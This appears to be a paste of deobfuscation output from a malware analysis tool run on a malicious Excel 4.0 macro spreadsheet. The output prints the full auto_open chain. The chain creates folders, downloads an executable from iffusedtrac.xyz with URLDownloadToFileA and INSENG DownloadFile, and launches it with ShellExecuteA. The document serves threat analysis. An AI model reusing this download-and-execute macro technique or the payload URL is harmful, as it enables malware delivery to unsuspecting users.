dissectmalware

Mal XLM Macro

Jan 22nd, 2021
  1. c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71
  2.  
  3. https://twitter.com/ffforward/status/1352529115451187200
  4. _ _______
  5. |\ /|( \ ( )
  6. ( \ / )| ( | () () |
  7. \ (_) / | | | || || |
  8. ) _ ( | | | |(_)| |
  9. / ( ) \ | | | | | |
  10. ( / \ )| (____/\| ) ( |
  11. |/ \|(_______/|/ \|
  12. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  13. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  14. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  15. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  16. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  17. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  18. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  19. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  20.  
  21.  
  22. XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  23.  
  24. File: C:\Users\user\Downloads\c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71.xls
  25.  
  26. Encrypted xls file
  27. [Loading Cells]
  28. WARNING *** file size (84997) not 512 + multiple of sector size (512)
  29. auto_open: auto_open->'LHu'!$HA$373
  30. [Starting Deobfuscation]
  31. CELL:HA373 , FullEvaluation , $GX$2555()
  32. CELL:GX2555 , FullEvaluation , SET.NAME(cvolheciepsi,https://iffusedtrac.xyz/3/bbc.exe)
  33. CELL:GX2556 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$BB$54)
  34. CELL:GX2557 , FullEvaluation , $DV$525()
  35. CELL:DV525 , FullEvaluation , FORMULA("https://iffusedtrac.xyz/3/bbc.exe",$BB$54)
  36. CELL:GX2558 , FullEvaluation , GOTO($FO$1446)
  37. CELL:FO1446 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe\dtwzrQf\GZTJoxx.exe)
  38. CELL:FO1447 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FQ$833)
  39. CELL:FO1448 , FullEvaluation , $DV$525()
  40. CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",$FQ$833)
  41. CELL:FO1449 , FullEvaluation , GOTO($IG$243)
  42. CELL:IG243 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe\dtwzrQf\GZTJoxx.exe)
  43. CELL:IG244 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AA$1219)
  44. CELL:IG245 , FullEvaluation , $DV$525()
  45. CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",$AA$1219)
  46. CELL:IG246 , FullEvaluation , GOTO($CT$2484)
  47. CELL:CT2484 , FullEvaluation , SET.NAME(cvolheciepsi,URLMON)
  48. CELL:CT2485 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$DD$48)
  49. CELL:CT2486 , FullEvaluation , $DV$525()
  50. CELL:DV525 , FullEvaluation , FORMULA("URLMON",$DD$48)
  51. CELL:CT2487 , FullEvaluation , GOTO($GR$866)
  52. CELL:GR866 , FullEvaluation , SET.NAME(cvolheciepsi,URLDownloadToFileA)
  53. CELL:GR867 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AO$1808)
  54. CELL:GR868 , FullEvaluation , $DV$525()
  55. CELL:DV525 , FullEvaluation , FORMULA("URLDownloadToFileA",$AO$1808)
  56. CELL:GR869 , FullEvaluation , GOTO($Q$755)
  57. CELL:Q755 , FullEvaluation , SET.NAME(cvolheciepsi,JJCCJJ)
  58. CELL:Q756 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$BE$2748)
  59. CELL:Q757 , FullEvaluation , $DV$525()
  60. CELL:DV525 , FullEvaluation , FORMULA("JJCCJJ",$BE$2748)
  61. CELL:Q758 , FullEvaluation , GOTO($HO$638)
  62. CELL:HO638 , FullEvaluation , SET.NAME(cvolheciepsi,Shell32)
  63. CELL:HO639 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FZ$1722)
  64. CELL:HO640 , FullEvaluation , $DV$525()
  65. CELL:DV525 , FullEvaluation , FORMULA("Shell32",$FZ$1722)
  66. CELL:HO641 , FullEvaluation , GOTO($HR$1806)
  67. CELL:HR1806 , FullEvaluation , SET.NAME(cvolheciepsi,ShellExecuteA)
  68. CELL:HR1807 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AA$2609)
  69. CELL:HR1808 , FullEvaluation , $DV$525()
  70. CELL:DV525 , FullEvaluation , FORMULA("ShellExecuteA",$AA$2609)
  71. CELL:HR1809 , FullEvaluation , GOTO($AJ$685)
  72. CELL:AJ685 , FullEvaluation , SET.NAME(cvolheciepsi,JJCCCCJ)
  73. CELL:AJ686 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$EH$734)
  74. CELL:AJ687 , FullEvaluation , $DV$525()
  75. CELL:DV525 , FullEvaluation , FORMULA("JJCCCCJ",$EH$734)
  76. CELL:AJ688 , FullEvaluation , GOTO($GE$1496)
  77. CELL:GE1496 , FullEvaluation , SET.NAME(cvolheciepsi,Open)
  78. CELL:GE1497 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FA$484)
  79. CELL:GE1498 , FullEvaluation , $DV$525()
  80. CELL:DV525 , FullEvaluation , FORMULA("Open",$FA$484)
  81. CELL:GE1499 , FullEvaluation , GOTO($AY$1410)
  82. CELL:AY1410 , FullEvaluation , SET.NAME(cvolheciepsi,regsvr32.exe)
  83. CELL:AY1411 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$HL$2686)
  84. CELL:AY1412 , FullEvaluation , $DV$525()
  85. CELL:DV525 , FullEvaluation , FORMULA("regsvr32.exe",$HL$2686)
  86. CELL:AY1413 , FullEvaluation , GOTO($GE$2891)
  87. CELL:GE2891 , FullEvaluation , SET.NAME(cvolheciepsi,rundll32.exe)
  88. CELL:GE2892 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$ER$2096)
  89. CELL:GE2893 , FullEvaluation , $DV$525()
  90. CELL:DV525 , FullEvaluation , FORMULA("rundll32.exe",$ER$2096)
  91. CELL:GE2894 , FullEvaluation , GOTO($AG$2509)
  92. CELL:AG2509 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe)
  93. CELL:AG2510 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$G$2318)
  94. CELL:AG2511 , FullEvaluation , $DV$525()
  95. CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe",$G$2318)
  96. CELL:AG2512 , FullEvaluation , GOTO($DB$2562)
  97. CELL:DB2562 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe\dtwzrQf)
  98. CELL:DB2563 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$U$370)
  99. CELL:DB2564 , FullEvaluation , $DV$525()
  100. CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe\dtwzrQf",$U$370)
  101. CELL:DB2565 , FullEvaluation , GOTO($GW$123)
  102. CELL:GW123 , FullEvaluation , SET.NAME(cvolheciepsi,Kernel32)
  103. CELL:GW124 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$EH$2782)
  104. CELL:GW125 , FullEvaluation , $DV$525()
  105. CELL:DV525 , FullEvaluation , FORMULA("Kernel32",$EH$2782)
  106. CELL:GW126 , FullEvaluation , GOTO($HF$2396)
  107. CELL:HF2396 , FullEvaluation , SET.NAME(cvolheciepsi,CreateDirectoryA)
  108. CELL:HF2397 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$W$2047)
  109. CELL:HF2398 , FullEvaluation , $DV$525()
  110. CELL:DV525 , FullEvaluation , FORMULA("CreateDirectoryA",$W$2047)
  111. CELL:HF2399 , FullEvaluation , GOTO($EJ$1217)
  112. CELL:EJ1217 , FullEvaluation , SET.NAME(cvolheciepsi,JCJ)
  113. CELL:EJ1218 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$EA$1633)
  114. CELL:EJ1219 , FullEvaluation , $DV$525()
  115. CELL:DV525 , FullEvaluation , FORMULA("JCJ",$EA$1633)
  116. CELL:EJ1220 , FullEvaluation , GOTO($FY$2397)
  117. CELL:FY2397 , FullEvaluation , SET.NAME(cvolheciepsi,INSENG)
  118. CELL:FY2398 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$H$206)
  119. CELL:FY2399 , FullEvaluation , $DV$525()
  120. CELL:DV525 , FullEvaluation , FORMULA("INSENG",$H$206)
  121. CELL:FY2400 , FullEvaluation , GOTO($BX$410)
  122. CELL:BX410 , FullEvaluation , SET.NAME(cvolheciepsi,DownloadFile)
  123. CELL:BX411 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FZ$1407)
  124. CELL:BX412 , FullEvaluation , $DV$525()
  125. CELL:DV525 , FullEvaluation , FORMULA("DownloadFile",$FZ$1407)
  126. CELL:BX413 , FullEvaluation , GOTO($CQ$2870)
  127. CELL:CQ2870 , FullEvaluation , SET.NAME(cvolheciepsi,BCCJ)
  128. CELL:CQ2871 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$GO$503)
  129. CELL:CQ2872 , FullEvaluation , $DV$525()
  130. CELL:DV525 , FullEvaluation , FORMULA("BCCJ",$GO$503)
  131. CELL:CQ2873 , FullEvaluation , GOTO($FX$1117)
  132. CELL:FX1117 , FullEvaluation , SET.NAME(cvolheciepsi,GEJunuZl)
  133. CELL:FX1118 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AJ$617)
  134. CELL:FX1119 , FullEvaluation , $DV$525()
  135. CELL:DV525 , FullEvaluation , FORMULA("GEJunuZl",$AJ$617)
  136. CELL:FX1120 , FullEvaluation , GOTO($Y$2822)
  137. CELL:Y2822 , FullEvaluation , SET.NAME(cvolheciepsi,cswzqQfY)
  138. CELL:Y2823 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FW$2046)
  139. CELL:Y2824 , FullEvaluation , $DV$525()
  140. CELL:DV525 , FullEvaluation , FORMULA("cswzqQfY",$FW$2046)
  141. CELL:Y2825 , FullEvaluation , GOTO($FP$1090)
  142. CELL:FP1090 , FullEvaluation , SET.NAME(cvolheciepsi,xgiDfkxI)
  143. CELL:FP1091 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$HH$1839)
  144. CELL:FP1092 , FullEvaluation , $DV$525()
  145. CELL:DV525 , FullEvaluation , FORMULA("xgiDfkxI",$HH$1839)
  146. CELL:FP1093 , FullEvaluation , $HA$374()
  147. CELL:HA374 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\wCmfmRe",0)
  148. CELL:HA375 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\wCmfmRe\dtwzrQf",0)
  149. CELL:HA377 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://iffusedtrac.xyz/3/bbc.exe","C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",0,0)
  150. CELL:HA379 , FullEvaluation , IF($HA$378<>0.0)
  151. CELL:HA380 , FullEvaluation , CALL("INSENG","DownloadFile","BCCJ","https://iffusedtrac.xyz/3/bbc.exe","C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",1)
  152. CELL:HA382 , FullEvaluation , END.IF
  153. CELL:HA384 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",,0,0)
  154. CELL:HA387 , End , HALT()
  155.  
  156. Files:
  157.  
  158. [END of Deobfuscation]
  159. time elapsed: 0.6546010971069336